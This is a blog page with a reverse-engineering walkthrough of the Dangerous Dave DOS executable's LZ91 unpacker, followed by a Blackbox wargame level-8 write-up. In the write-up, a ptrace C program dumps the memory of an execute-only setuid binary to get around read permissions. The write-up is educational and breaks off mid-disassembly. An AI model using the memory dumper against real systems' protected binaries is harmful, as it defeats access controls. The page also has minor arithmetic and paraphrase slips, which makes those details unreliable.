Dany's 'blog: 2012

Friday, December 7, 2012

Reverse engineering Dangerous Dave: Packaging

I've been looking to take on a reverse-engineering project, as a means to practice the skill, for quite some time now.

I needed something simple, but not trivial. Old DOS games seemed like a nice option, since they are mostly small and not very complex, yet the challenge will still be real.
Now, Dangerous Dave is one of the most ubiquitous games out there, it has been around since the late 80's, and as such, it will be small enough for me to undertake as a first project.

Opening the file using the freeware version of IDA Pro, I got informed that the file is possibly a packed file. This means I should expect a big lump of data and some bootstrapping code that would unpack that data into executable code.

For the sake of exercise, I want to try tackling the disassembly of the unpacker using freely available tools.

Starting with the EXE header (for additional reference on EXE, a.k.a MZ, file structure you can check out http://www.tavi.co.uk/sdos/exeformat.html).
Let's look at a hex dump of the header:

$ xxd DAVE.EXE |head
0000000: 4d5a 2a01 9600 0000 0200 e31c ffff 3e2a  MZ*...........>*
0000010: 8000 0000 0e00 9812 1c00 0000 4c5a 3931  ............LZ91
0000020: ffff ba4d 252e 8916 3502 b430 cd21 8b2e  ...M%...5..0.!..
0000030: 02ff ff00 8b1e 2c00 8eda a390 008c 068e  ......,.........
0000040: 0089 1ef0 1f8a fc2e a600 e83d 01c4 3e88  ...........=..>.
0000050: feff e4c7 8bd8 b9ff 7ffc f2ae e361 4326  .............aC&
0000060: 38ff e105 75f6 80cd 80f7 d989 0ee5 b901  8...u...........
0000070: ff10 00d3 e383 c308 83e3 f8cb 8cfe 7fc3  ................
0000080: da2b ea8b 3ebe 4b81 ff00 0273 07bf 48ff  .+..>.K....s..H.
0000090: fb89 f3c7 129f 7228 033e ff1f b24b 7222  ......r(.>...Kr"

The field which are of interest are:

Header paragraphs = 2
This is where the actual "program" starts in the file, i.e. this is the the start of the image that will be loaded into memory by the DOS loader.
Initial CS = 0x1298
This is the segment address where that code will start executing
Initial IP = 0xE
This is the offset within the above segment where the loader will jump once the file has been loaded into memory.

Using these 3 parameters I we can calculate the offset of the program's entry point in terms of offset from the start of the EXE file.
One thing to notice though, is that the initial IP is not 0, meaning there might be some data in the code segment.
Anyway, to find the offset of the code segment within the file, we need to skip the header which occupies 2 paragraphs, and an additional CS (=0x1298) paragraphs. Each paragraph is 16 bytes long, resulting in a total offset of 2 * 16 + 0x1298 * 2 = 0x129A0 bytes.
To disassemble the code I will use nasm (http://www.nasm.us/). I want to start disassembling at offset 0x129A0 from the start of the file, and skip the first 0xE(=14) (allegedly) data bytes. The former is facilitated by the -e switch, and the latter by specifying a sync point using the -s switch (you can read all about the different switches here) like this:

$ ndisasm -b 16 -e129A0h -sEh
00000000  0000              add [bx+si],al
00000002  0000              add [bx+si],al
00000004  80003F            add byte [bx+si],0x3f
...

I will now go over each section I managed to identify in the executable and discuss it in detail.

Packed code

All the data from the 3rd (we have 2 header paragraphs) to the 1299th paragraph in the file. This is just one big chunk of data whose composition we do not yet now.

Unpacker data

Remember that there is a non 0 initial IP specified in the header? Well, that's because the first 14 bytes in the code segment are data:

$xxd DAVE.EXE |grep "129a0"
00129a0: 0000 0000 8000 3f2f 9812 8d17 8a01 060e  ......?/........

The only interesting observation which can be made here is that 9812 looks a lot like an little endian encoding of 0x1298 which is exactly the size of the packed code in paragraphs, so we can name it: word_0x8 = 0x1298 = packed code paragraphs.

Bootstrapping

This section itself is quite complex, and contains several parts, I will try to divide them logically.

$ ndisasm -b 16 -e129A0h -sEh
...
0000000E  06                push es

This line is a bit curious now, it pushes es into the stack. During the loading process, es is loaded with the address of the PSP segment. While the segment contains very interesting system information, the "real" importance of it in this context is that it is the segment of the program's base, because immediately following the PSP segment, the executable is loaded. This will be important later, so for now we need to remember that the address of the PSP segment is saved to the stack.

0000000F  0E                push cs
00000010  1F                pop ds
00000011  8B0E0C00          mov cx,[0xc]  ; word_0xc = 0x18a
00000015  8BF1              mov si,cx
00000017  4E                dec si
00000018  89F7              mov di,si
0000001A  8CDB              mov bx,ds
0000001C  031E0A00          add bx,[0xa]  ; word_0xa = 0x178d
00000020  8EC3              mov es,bx
00000022  FD                std
00000023  F3A4              rep movsb

Basically a memcpy of a chunk of 0x18a bytes from the beginning of the current segment, to some address located 0x178d paragraphs forward. This chunk is exactly the all code from the start of the segment to the end of the file, which means that the bootstrapping code itself is copied forward in memory to make room for the unpacked data.
One thing to notice is the method with which the code is copied. The addresses loaded into the source (ds:si) and destination (es:di) point to the end of the copied buffers, and the direction flag (DF) is set (by the std instruction) so after each movsb the si and di registers will decrease.
This means that when the copy loop has finished, es:di will point to the end of the free memory (just below the copy of the bootstrapping code) and ds:si will point to the end of the compressed code.
By the way, two words in the data section can now be named:

word_0xc = bootstrap code size
word_0xa = unpacked code paragraphs

00000025  53                push bx
00000026  B82B00            mov ax,0x2b
00000029  50                push ax
0000002A  CB                retf

This just pushes the new segment address of the copy of the bootstrap code (in bx), and then the offset 0x2b, making the retf serve as a far jump to bx:0x2b. Since there is no difference between the running code and its copy, we can just look at offset 0x2b in the current code to see where the program will continue execution.

0000002B  2E8B2E0800        mov bp,[cs:0x8]
00000030  8CDA              mov dx,ds
00000032  89E8              mov ax,bp
00000034  3D0010            cmp ax,0x1000
00000037  7603              jna 0x3c
00000039  B80010            mov ax,0x1000
0000003C  29C5              sub bp,ax
0000003E  29C2              sub dx,ax
00000040  29C3              sub bx,ax
00000042  8EDA              mov ds,dx
00000044  8EC3              mov es,bx
00000046  B103              mov cl,0x3
00000048  D3E0              shl ax,cl
0000004A  89C1              mov cx,ax
0000004C  D1E0              shl ax,1
0000004E  48                dec ax
0000004F  48                dec ax
00000050  8BF0              mov si,ax
00000052  8BF8              mov di,ax
00000054  F3A5              rep movsw
00000056  09ED              or bp,bp
00000058  75D8              jnz 0x32

Translated to C (almost, I will use segmented addressing notation), the code above will look like this:

paragraphs_left = compressed_code_paragraphs;
while (paragraphs_left > 0) {
    if (paragraphs_left < 0x1000) {
        paragraphs_to_copy = paragraphs_left;
    } else {
        paragraphs_to_copy = 0x1000;
    }
    paragraphs_left -= paragraphs_to_copy;
    source_segment -= paragraphs_to_copy;
    destination_segment -= paragraphs_to_copy;
    source_offset = destination_offset = paragraphs_to_copy * 16 - 1;
    words_to_copy = paragraphs_to_copy * 8;
    while (words_to_copy > 0) {
        *destination_segment:destination_offset = *source_segment:source_offset;
        destination_offset -= 2;
        source_offset -= 2;
        words_to_copy--;
    }
}

All this does is copy the packed code to the area adjacent and below the copy of the bootstrapping code.
The reason for copying in "chunks" is that you can only address 64KiB within a segment, that's 0x1000 paragraphs. So every 64KiB, the segment addressed of both the source and destination need to be readjusted.
After all the code/data is in place, the unpacking can begin.
First, make sure the source pointer points to the copy of the packed code, and the destination pointer points to the programs first segment (the beginning of the original packed code):

0000005B  8EC2              mov es,dx
0000005D  8EDB              mov ds,bx
0000005F  31F6              xor si,si
00000061  31FF              xor di,di

Now starts the unpacking routine. Because I don't want to paste a wall of code and then discuss its analysis, I will outline the unpacking algorithm, and then analyze small chunks of asm code to fill in the details.

Unpacker

The basic idea is that the packed code is composed of control data which comes in words, and regular data whose handling is specified by the control data.

00000063  BA1000            mov dx,0x10

So, dx is loaded with 16 (which is the number of bits in a word).

00000066  AD                lodsw
00000067  89C5              mov bp,ax

Then a word from the packed code is loaded into bp.

00000069  D1ED              shr bp,1
0000006B  4A                dec dx
0000006C  7505              jnz 0x73
0000006E  AD                lodsw
0000006F  89C5              mov bp,ax
00000071  B210              mov dl,0x10

This is a piece of code which will repeat a lot. What it does is shift the LSB of the control word into the CF, then update the remaining bits count (in dx) and if it has reached 0, the next control word is loaded into bp and the remaining bits count is reset.

00000073  7303              jnc 0x78
00000075  A4                movsb
00000076  EBF1              jmp short 0x69

This code actually handles the bit we pushed from the control word into the CF. If CF is set (control bit was 1) then copy a byte from the packed code to the unpacked code as-is and continue reading the next control bit. Otherwise (control bit was 0) continue with:

00000078  31C9              xor cx,cx

Reset cx.

0000007A  D1ED              shr bp,1
0000007C  4A                dec dx
0000007D  7505              jnz 0x84
0000007F  AD                lodsw
00000080  89C5              mov bp,ax
00000082  B210              mov dl,0x10

This should be familiar from before, just read the next bit and load a new word if needed.

00000084  7222              jc 0xa8

We will handle the case where the control bit is '1' later. If, however, the control bit was '0':

00000086  D1ED              shr bp,1
00000088  4A                dec dx
00000089  7505              jnz 0x90
0000008B  AD                lodsw
0000008C  89C5              mov bp,ax
0000008E  B210              mov dl,0x10

Load the next control bit into CF.

00000090  D1D1              rcl cx,1

And push it into cx (from right to left).

00000092  D1ED              shr bp,1
00000094  4A                dec dx
00000095  7505              jnz 0x9c
00000097  AD                lodsw
00000098  89C5              mov bp,ax
0000009A  B210              mov dl,0x10

Read another control bit

0000009C  D1D1              rcl cx,1

And shift it into cx too. So what we get in essence is the two control bits in reverse order in cx.

0000009E  41                inc cx
0000009F  41                inc cx

Add 2 to cx.

000000A0  AC                lodsb
000000A1  B7FF              mov bh,0xff
000000A3  8AD8              mov bl,al

Load the next byte from the packed code into bl, and put 0xff in bh. This will result in bx containing the signed (and negative) value of read_byte-256.

000000A5  E91300            jmp word 0xbb

Continue execution at:

000000BB  268A01            mov al,[es:bx+di]
000000BE  AA                stosb
000000BF  E2FA              loop 0xbb
000000C1  EBA6              jmp short 0x69

This is equivalent to:

while (cx-- > 0) {
    *destination_segment:destination_offset = *destination_segment:(destination_offset + bx);
    destination_offset++;
}

This code copies a chunk of cx bytes from already unpacked code (remember bx < 0) to the head of the unpacked code. This means that:

The byte that was loaded into bx represents an offset.
The two bits (+2) which were loaded into cx represents a length.

Let's recap before we continue.
The packed code is composed of control words, which are read bit-by bit from LSB to MSB.
If we encounter a 1, we copy the next byte in the packed code to the unpacked code as-is.
If we encounter two 0's in a row, we need to copy N+2 bytes from the current position in the unpacked data minus D, where N is the next two bits in the control, and D is the next byte in the packed code.
How about if we read a 0 and then a 1? Well, that's the case I said we'll do later.

000000A8  AD                lodsw
000000A9  8BD8              mov bx,ax

Read a word from the packed data into ax (and bx).

000000AB  B103              mov cl,0x3
000000AD  D2EF              shr bh,cl
000000AF  80CFE0            or bh,0xe0
000000B2  80E407            and ah,0x7

This code separates two values encoded into the word. The 3 least significant bits of the high byte are loaded into ax, while the remaining 5 most significant bits are shifted right. The "or bh,0xe0" causes bx to contain the signed (and negative) value of its former value - 8192.

000000B5  740C              jz 0xc3

We will handle the case in which ax turned out to be 0 later. If ax was not 0:

000000B7  88E1              mov cl,ah
000000B9  41                inc cx
000000BA  41                inc cx

Just sets cx to ax+2.

000000BB  268A01            mov al,[es:bx+di]
000000BE  AA                stosb
000000BF  E2FA              loop 0xbb
000000C1  EBA6              jmp short 0x69

This is the same copy loop we analyzed before. This means that the 3 least-significant bits in the high byte are an encoded length (-2), and the rest of the word, when recombined is the offset. Notice that in while in the previous case, the copied chunk's length was limited to 5 bytes, and the offset to 256, here the length is limited to 9 bytes, and the offset to 8192. How about that case in which the length we read is 0? Well:

000000C3  AC                lodsb

Read another byte from the packed code.

000000C4  08C0              or al,al
000000C6  7434              jz 0xfc
000000C8  3C01              cmp al,0x1
000000CA  7405              jz 0xd1

I'll cover the cases in which the read byte is 0 or 1 later.

000000CC  88C1              mov cl,al
000000CE  41                inc cx
000000CF  EBEA              jmp short 0xbb

If the read byte is bigger than 1, then load cx with that value + 1, and jump to the copying code. This means that the byte we read specified a length. Now let's handle the case in which that byte was 1:

000000D1  89FB              mov bx,di
000000D3  83E70F            and di,byte +0xf
000000D6  81C70020          add di,0x2000
000000DA  B104              mov cl,0x4
000000DC  D3EB              shr bx,cl
000000DE  8CC0              mov ax,es
000000E0  01D8              add ax,bx
000000E2  2D0002            sub ax,0x200
000000E5  8EC0              mov es,ax
000000E7  89F3              mov bx,si
000000E9  83E60F            and si,byte +0xf
000000EC  D3EB              shr bx,cl
000000EE  8CD8              mov ax,ds
000000F0  01D8              add ax,bx
000000F2  8ED8              mov ds,ax
000000F4  E972FF            jmp word 0x69

Remember that I mentioned earlier that we can't address more than 64KiB within a segment? Well, this limit could be reached while we are copying bytes to the uncompressed code. To avoid it, we need to readjust the segment addresses of both the source and destination segments. This is exactly what the code does, for each of the addresses, it adds the number of paragraphs which fit inside the offset to the segment address, and leaves the remainder in the offset. For example, if es:di = 0x1234:0x5678:

We can fit 0x567 paragraphs in 0x5678 bytes.
Add 0x567 to the segment address to obtain 0x179b
The remainder, 0x8, is left in the offset
The readjusted address is 0x179b:0x0008 is equivalent to 0x1234:0x5678 (you can check yourself by comparing the linear addresses), but the addressing limitation within the segment has been overcome.

This just leaves the last case of the read byte being 0. Well, that's the "end-of-stream" marker, which means the unpacking process is done.

So to summarize the unpacking algorithm (I use C to denote the current offset in the output):

The packed code contains control words.
The control words are read bit-by-bit from LSB to MSB.
1 - read the next byte from the stream and copy it to the output as-is.
00 - read the next two bits from the control into N. read the next byte from the stream into D. Copy N+2 bytes from C+D-256 to the output.
01 - read the next word from the stream. Extract N from the 3 LSB of the high bytes, and D from the word resulting by right-shifting the high byte by 3. Then:

If N = 0, This is the end of stream, we are done.
If N = 1, We need to readjust the segments.
if N > 1, Copy N+1 bytes from C+D-8192 to the output.

This algorithm specification is actually enough to be able to unpack the code.
But in reality, the bootstrapping is not over yet. For one, the control needs to be passed to the unpacked code.
So for the sake of being thorough, let's continue just a bit more.

Relocation

When the end-of-stream has been reached, we jump to:

000000FC  0E                push cs
000000FD  1F                pop ds
000000FE  BE5801            mov si,0x158

Set ds to the current code segment, and load si with 0x158. This leads me to suspect that ds:si is now pointing to some data at the tail of the code:

$ xxd DAVE.EXE |grep -A20 "12af0:"
0012af0: 8ed6 8be7 fb2e ff2f 01dd 3200 3910 1530  ......./..2.9..0
0012b00: 2515 0015 3e12 00ed 1019 2000 0b14 00f0  %...>..... .....
0012b10: 0100 5e01 c85a 008d 0900 670a 5b87 4cdd  ..^..Z....g.[.L.
0012b20: 7400 8a01 0081 0200 0100                 t.........

Not that there will be any use for that data to us.

00000101  5B                pop bx
00000102  83C310            add bx,byte +0x10
00000105  89DA              mov dx,bx

OK, remember from way way before, when I said that the PSP segment was pushed to the stack? Well, it's still there (so far all the stack operations were balanced). The size of the PSP is 256 bytes, or, 10 paragraphs, so bx holds the segment address immediately following the PSP, which is also the start of the code, this time the unpacked code.

00000107  31FF              xor di,di
00000109  AC                lodsb
0000010A  08C0              or al,al
0000010C  7416              jz 0x124
0000010E  B400              mov ah,0x0
00000110  01C7              add di,ax
00000112  8BC7              mov ax,di
00000114  83E70F            and di,byte +0xf
00000117  B104              mov cl,0x4
00000119  D3E8              shr ax,cl
0000011B  01C2              add dx,ax
0000011D  8EC2              mov es,dx
0000011F  26011D            add [es:di],bx
00000122  EBE5              jmp short 0x109
00000124  AD                lodsw
00000125  09C0              or ax,ax
00000127  7508              jnz 0x131
00000129  81C2FF0F          add dx,0xfff
0000012D  8EC2              mov es,dx
0000012F  EBD8              jmp short 0x109
00000131  3D0100            cmp ax,0x1
00000134  75DA              jnz 0x110

I'll spare you the deep analysis, but what happens here is this:

That data contains offsets to addresses which need to be relocated.
These offsets are cumulative (the offset to relocation address N is the sum of the first N entries in the table).
For each relocation address, the segment address of the code start is added to the segment address in the code.
The way these offsets are encoded is that each offset is a byte, unless that byte is 0, in which case the offset is a word.
The iteration ends when a word whose value is 1 is read.

This sums up the relocation process.

Wrapping up

The only thing left is jumping into the unpacked (and relocated) code to start the game:

00000136  8BC3              mov ax,bx

The segment address of the code start is loaded into ax.

00000138  8B3E0400          mov di,[0x4]        ; di = var_0x4
0000013C  8B360600          mov si,[0x6]
00000140  01C6              add si,ax           ; si = var_0x6 + reloc
00000142  01060200          add [0x2],ax        ; var_0x2 += reloc
00000146  2D1000            sub ax,0x10
00000149  8ED8              mov ds,ax           ; ds = PSP segment
0000014B  8EC0              mov es,ax           ; es = PSP segment
0000014D  31DB              xor bx,bx           ; bx = 0
0000014F  FA                cli
00000150  8ED6              mov ss,si           ; ss = var_0x6 + reloc
00000152  8BE7              mov sp,di           ; sp = var_0x4
00000154  FB                sti

This code just sets up the initial stack address (segment & offset), which also means that we can identify var_0x6 as the initial stack segment and var_0x4 as the initial stack offset. The code also loads var_0x2 with the segment address of the code start. The next (and last) instruction will reveal why:

00000155  2EFF2F            jmp word far [cs:bx]

This is a far jump, meaning that the address is loaded from two words at cs:0, the first (var_0x0) is the offset, and the second (var_0x2) is the segment, which means that the entry points in the unpacked code is simply its beginning.

That's it for the easy and fun part, next time I will start reverse engineering the code we had just unpacked.

Saturday, January 28, 2012

Blackbox - chapter 8

As in the previous posts, the password for the next level has been replaced with question marks so as to not make this too obvious, and so that the point of the walkthrough, which is mainly educational, will not be missed.

Also, make sure you notice this SPOILER ALERT! If you want to try and solve the level by yourself then read no further!

Let's see what level 8 holds in store:

$ ssh -p 2225 level8@blackbox.smashthestack.org
level8@blackbox.smashthestack.org's password:
...
level8@blackbox:~$ ls -l
total 16
-rw-r--r-- 1 root   root      10 2008-01-24 05:58 password
-rws--x--x 1 level9 level9 12254 2007-12-29 14:10 secrets

Wait a minute here, what's that? We only have execution permissions for secrets.
How can we analyze it if we can't even read it?
Well, there is a way, using ptrace sorcery. I won't go into too much depth here, so I recommend you read Playing with ptrace, Part I (I'd also recommend you read part II, just for general knowledge).
Anyway, to summarize these articles, the way debuggers work is by forking, invoking ptrace with PTRACE_TRACEME in the child, and then executing the to-be-traced process. The parent process can then control the child process and read its status using other ptrace calls.
So let's write a little program that does just that, and reads the memory contents of the child process where the child process will be secrets, this is how we can cheat the permission mechanism.

level8@blackbox:/tmp$ cat > wrap.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/user.h>
#include <sys/ptrace.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    int pid;
    char *prog[] = {"/home/level8/secrets", NULL};
    long addr;
    long size;
    int i = 0;
    int val;
    struct user_regs_struct regs;
    if (argc != 3) {
        printf("Usage: %s <address> <number of long words>\n", argv[0]);
        return 1;
    }
    addr = strtoul(argv[1], NULL, 16);
    size = strtoul(argv[2], NULL, 10);
    pid = fork();
    if (0 == pid) {
        ptrace(PTRACE_TRACEME, 0, NULL, NULL);
        execve(prog[0], prog, NULL);
    } else {
        wait(NULL);
        for (i = 0; i < size; ++i) {
            val = ptrace(PTRACE_PEEKTEXT, pid, addr + 4*i, NULL);
            printf("%02x", val & 0xFF);
            printf("%02x", (val >> 8) & 0xFF);
            printf("%02x", (val >> 16) & 0xFF);
            printf("%02x", (val >> 24) & 0xFF);
        }
        printf("\n");
        ptrace(PTRACE_KILL, pid, NULL, NULL);
    }
    return 0;
}

level8@blackbox:/tmp$ gcc -o wrap wrap.c

As you can see, the child just invokes ptrace with PTRACE_TRACEME and executes the level's program.
The parents waits for the child to stop, and then reads the specified amount of long words from the specified address, prints them out encoded as a hex string, and then kills the child.
Let's try out our new toy, but which address interests us? Well, the function main commonly starts at 0x08048464, as for the number of bytes we read, let's read some large amount, I'm sure main isn't too long:

level8@blackbox:/tmp$ ./wrap 0x08048464 200
5589e55381ec3404000083e4f0b80000000029c4c745f464870408c7042475870408e8cdfeffff8945f0c
785e4fbffff000000008b45f0890424e8c5feffff483985e4fbffff734781bde4fbfffffb0300007602eb
398d85e8fbffff89c3039de4fbffff8b85e4fbffff0345f08d48018b85e4fbffff0345f00fb6100fb6012
8d0045a88038d85e4fbffffff00eba58d85e8fbffff89c20395e4fbffff8b85e4fbffff0345f00fb600c0
f804240f042188028d85e9fbffff89c20395e4fbffff8b85e4fbffff0345f00fb600240f042188028d85e
afbffff0385e4fbffffc60000c785e4fbffff000000008d85e8fbffff890424e80bfeffff483985e4fbff
ff7205e99b0000008d85e8fbffff89c1038de4fbffff8d85e8fbffff89c20395e4fbffff8d85e9fbffff0
385e4fbffff0fb600320288018d85e9fbffff89c1038de4fbffff8d85e9fbffff89c20395e4fbffff8d85
e8fbffff0385e4fbffff0fb600320288018d85e8fbffff89c1038de4fbffff8d85e8fbffff89c20395e4f
bffff8d85e9fbffff0385e4fbffff0fb600320288018d85e4fbffff830002e949ffffff8d95e8fbffff8b
45f489442404891424e81dfdffff85c0751ac7042492870408e85dfdffffc704249b870408e811fdffffe
b0cc70424a3870408e843fdffffb8000000008b5dfcc9c3905589e5575631f65383ec0ce8a000000081c3
44120000e8a5fcffff8d9314ffffff8d8314ffffff29c2c1fa0239d6731c89d78db426000000008dbc270
0000000ff94b314ffffff4639fe72f483c40c5b5e5f5dc38db6000000008dbf000000005589e583ec0889
1c24e84200000081c3e6110000897424048d8314ffffff8d9314ffffff29d0c1f80285c08d70ff7510e85
b0000008b1c248b74240489ec5dc3ff94b314ffffff89f04e85c075f2ebe08b1c24c39090909090909090
909090905589e55383ec04bb90980408a19098040883f8ff74168d76008dbc270000000083eb04ffd08b0
383f8ff75f4585b5dc35589e553e8000000005b81c35b11000052e89afcffff8b5dfcc9c3000300000001
000200555b5b5a526357666358564d246c222300506c6561736520656e74657220796f

Now, to disassemble this I will use nasm which is not installed on the blackbox server. First I'll decode the hex string into a binary file which I will call main.bin, and then I will disassemble it at the base address of main:

~$ ndisasm -u -o 0x08048464 main.bin |cat -n|grep ret
   124 0804864E  C3                ret
   154 080486A3  C3                ret
   176 080486EF  C3                ret
   184 08048703  C3                ret
   215 0804873F  C3                ret
   226 0804875A  C3                ret
~$ ndisasm -u -o 0x08048464 main.bin | head -n 124
08048464  55                push ebp
08048465  89E5              mov ebp,esp
08048467  53                push ebx
08048468  81EC34040000      sub esp,0x434
0804846E  83E4F0            and esp,byte -0x10
08048471  B800000000        mov eax,0x0
08048476  29C4              sub esp,eax
08048478  C745F464870408    mov dword [ebp-0xc],0x8048764
0804847F  C7042475870408    mov dword [esp],0x8048775
08048486  E8CDFEFFFF        call dword 0x8048358
0804848B  8945F0            mov [ebp-0x10],eax
0804848E  C785E4FBFFFF0000  mov dword [ebp-0x41c],0x0
         -0000
08048498  8B45F0            mov eax,[ebp-0x10]
0804849B  890424            mov [esp],eax
0804849E  E8C5FEFFFF        call dword 0x8048368
080484A3  48                dec eax
080484A4  3985E4FBFFFF      cmp [ebp-0x41c],eax
080484AA  7347              jnc 0x80484f3
080484AC  81BDE4FBFFFFFB03  cmp dword [ebp-0x41c],0x3fb
         -0000
080484B6  7602              jna 0x80484ba
080484B8  EB39              jmp short 0x80484f3
080484BA  8D85E8FBFFFF      lea eax,[ebp-0x418]
080484C0  89C3              mov ebx,eax
080484C2  039DE4FBFFFF      add ebx,[ebp-0x41c]
080484C8  8B85E4FBFFFF      mov eax,[ebp-0x41c]
080484CE  0345F0            add eax,[ebp-0x10]
080484D1  8D4801            lea ecx,[eax+0x1]
080484D4  8B85E4FBFFFF      mov eax,[ebp-0x41c]
080484DA  0345F0            add eax,[ebp-0x10]
080484DD  0FB610            movzx edx,byte [eax]
080484E0  0FB601            movzx eax,byte [ecx]
080484E3  28D0              sub al,dl
080484E5  045A              add al,0x5a
080484E7  8803              mov [ebx],al
080484E9  8D85E4FBFFFF      lea eax,[ebp-0x41c]
080484EF  FF00              inc dword [eax]
080484F1  EBA5              jmp short 0x8048498
080484F3  8D85E8FBFFFF      lea eax,[ebp-0x418]
080484F9  89C2              mov edx,eax
080484FB  0395E4FBFFFF      add edx,[ebp-0x41c]
08048501  8B85E4FBFFFF      mov eax,[ebp-0x41c]
08048507  0345F0            add eax,[ebp-0x10]
0804850A  0FB600            movzx eax,byte [eax]
0804850D  C0F804            sar al,0x4
08048510  240F              and al,0xf
08048512  0421              add al,0x21
08048514  8802              mov [edx],al
08048516  8D85E9FBFFFF      lea eax,[ebp-0x417]
0804851C  89C2              mov edx,eax
0804851E  0395E4FBFFFF      add edx,[ebp-0x41c]
08048524  8B85E4FBFFFF      mov eax,[ebp-0x41c]
0804852A  0345F0            add eax,[ebp-0x10]
0804852D  0FB600            movzx eax,byte [eax]
08048530  240F              and al,0xf
08048532  0421              add al,0x21
08048534  8802              mov [edx],al
08048536  8D85EAFBFFFF      lea eax,[ebp-0x416]
0804853C  0385E4FBFFFF      add eax,[ebp-0x41c]
08048542  C60000            mov byte [eax],0x0
08048545  C785E4FBFFFF0000  mov dword [ebp-0x41c],0x0
         -0000
0804854F  8D85E8FBFFFF      lea eax,[ebp-0x418]
08048555  890424            mov [esp],eax
08048558  E80BFEFFFF        call dword 0x8048368
0804855D  48                dec eax
0804855E  3985E4FBFFFF      cmp [ebp-0x41c],eax
08048564  7205              jc 0x804856b
08048566  E99B000000        jmp dword 0x8048606
0804856B  8D85E8FBFFFF      lea eax,[ebp-0x418]
08048571  89C1              mov ecx,eax
08048573  038DE4FBFFFF      add ecx,[ebp-0x41c]
08048579  8D85E8FBFFFF      lea eax,[ebp-0x418]
0804857F  89C2              mov edx,eax
08048581  0395E4FBFFFF      add edx,[ebp-0x41c]
08048587  8D85E9FBFFFF      lea eax,[ebp-0x417]
0804858D  0385E4FBFFFF      add eax,[ebp-0x41c]
08048593  0FB600            movzx eax,byte [eax]
08048596  3202              xor al,[edx]
08048598  8801              mov [ecx],al
0804859A  8D85E9FBFFFF      lea eax,[ebp-0x417]
080485A0  89C1              mov ecx,eax
080485A2  038DE4FBFFFF      add ecx,[ebp-0x41c]
080485A8  8D85E9FBFFFF      lea eax,[ebp-0x417]
080485AE  89C2              mov edx,eax
080485B0  0395E4FBFFFF      add edx,[ebp-0x41c]
080485B6  8D85E8FBFFFF      lea eax,[ebp-0x418]
080485BC  0385E4FBFFFF      add eax,[ebp-0x41c]
080485C2  0FB600            movzx eax,byte [eax]
080485C5  3202              xor al,[edx]
080485C7  8801              mov [ecx],al
080485C9  8D85E8FBFFFF      lea eax,[ebp-0x418]
080485CF  89C1              mov ecx,eax
080485D1  038DE4FBFFFF      add ecx,[ebp-0x41c]
080485D7  8D85E8FBFFFF      lea eax,[ebp-0x418]
080485DD  89C2              mov edx,eax
080485DF  0395E4FBFFFF      add edx,[ebp-0x41c]
080485E5  8D85E9FBFFFF      lea eax,[ebp-0x417]
080485EB  0385E4FBFFFF      add eax,[ebp-0x41c]
080485F1  0FB600            movzx eax,byte [eax]
080485F4  3202              xor al,[edx]
080485F6  8801              mov [ecx],al
080485F8  8D85E4FBFFFF      lea eax,[ebp-0x41c]
080485FE  830002            add dword [eax],byte +0x2
08048601  E949FFFFFF        jmp dword 0x804854f
08048606  8D95E8FBFFFF      lea edx,[ebp-0x418]
0804860C  8B45F4            mov eax,[ebp-0xc]
0804860F  89442404          mov [esp+0x4],eax
08048613  891424            mov [esp],edx
08048616  E81DFDFFFF        call dword 0x8048338
0804861B  85C0              test eax,eax
0804861D  751A              jnz 0x8048639
0804861F  C7042492870408    mov dword [esp],0x8048792
08048626  E85DFDFFFF        call dword 0x8048388
0804862B  C704249B870408    mov dword [esp],0x804879b
08048632  E811FDFFFF        call dword 0x8048348
08048637  EB0C              jmp short 0x8048645
08048639  C70424A3870408    mov dword [esp],0x80487a3
08048640  E843FDFFFF        call dword 0x8048388
08048645  B800000000        mov eax,0x0
0804864A  8B5DFC            mov ebx,[ebp-0x4]
0804864D  C9                leave
0804864E  C3                ret

I hope you don't mind that we switched from the gas syntax to the intel syntax, but it's good to learn to read both.
Anyway, since we disassembled raw code, we don't have any symbolic information, so we are going to have have to guess function based on context. So let's start:

08048478  C745F464870408    mov dword [ebp-0xc],0x8048764

This loads the local variable at ebp-0xc with some constant which looks like an address in the data section. Let's use our tool again to read what's in that address.

level8@blackbox:/tmp$ ./wrap 0x08048764 10
555b5b5a526357666358564d246c222300506c6561736520656e74657220796f7572207061737377

See the 00 there? I suspect it is a string terminator, let's see what that string is:

level8@blackbox:/tmp$ python -c "print '%r' % '555b5b5a526357666358564d246c\
2223'.decode('hex')"
'U[[ZRcWfcXVM$l"#'

Odd string...seems like gibberish, we'll give ebp-0xc the name gibberish then. Let's continue, it might make more sense later:

0804847F  C7042475870408    mov dword [esp],0x8048775
08048486  E8CDFEFFFF        call dword 0x8048358
0804848B  8945F0            mov [ebp-0x10],eax

This is a function call with one parameter, which also looks like an address in the data section:

level8@blackbox:/tmp$ ./wrap 0x08048775 10
506c6561736520656e74657220796f75722070617373776f72643a200057656c636f6d650a002f62

Again, I spot another string terminator, so let's decode the string:

level8@blackbox:/tmp$ python -c "print '%r' % '506c6561736520656e7465722079\
6f75722070617373776f72643a20'.decode('hex')"
'Please enter your password: '

Aha, a prompt. It also looks like the return value is stored in the stack at ebp-0x10. This means that this is not some regular printf or puts.

0804848E  C785E4FBFFFF0000  mov dword [ebp-0x41c],0x0
         -0000

That's some sort of initialization of a variable at ebp-0x41c.

08048498  8B45F0            mov eax,[ebp-0x10]
0804849B  890424            mov [esp],eax
0804849E  E8C5FEFFFF        call dword 0x8048368
080484A3  48                dec eax
080484A4  3985E4FBFFFF      cmp [ebp-0x41c],eax
080484AA  7347              jnc 0x80484f3

This executes a mystery function on whatever was stored in ebp-0x10 (the return from that prompt function), subtracts 1 from the return value and compares the result to the variable at ebp-0x41c. Sort of like this:

if (var_41c >= (func(var_10) - 1)) goto 0x80484f3

Let's call that address label1 from now on, in case we see it again.

080484AC  81BDE4FBFFFFFB03  cmp dword [ebp-0x41c],0x3fb
         -0000
080484B6  7602              jna 0x80484ba
080484B8  EB39              jmp short 0x80484f3

This compares var_41c to the constant 0x3fb, and jumps to some new location, or to label1 if the test fails. Equivalent C code:

if (var_41c <= 0x3fb) goto 0x80484f3
else goto label1

Let's call the new address label2.
For the next piece of code, notice it starts at label2, I'll just annotate it:

label2:
080484BA  8D85E8FBFFFF      lea eax,[ebp-0x418]
080484C0  89C3              mov ebx,eax
080484C2  039DE4FBFFFF      add ebx,[ebp-0x41c]
080484C8  8B85E4FBFFFF      mov eax,[ebp-0x41c]
080484CE  0345F0            add eax,[ebp-0x10]
080484D1  8D4801            lea ecx,[eax+0x1]
080484D4  8B85E4FBFFFF      mov eax,[ebp-0x41c]
080484DA  0345F0            add eax,[ebp-0x10]
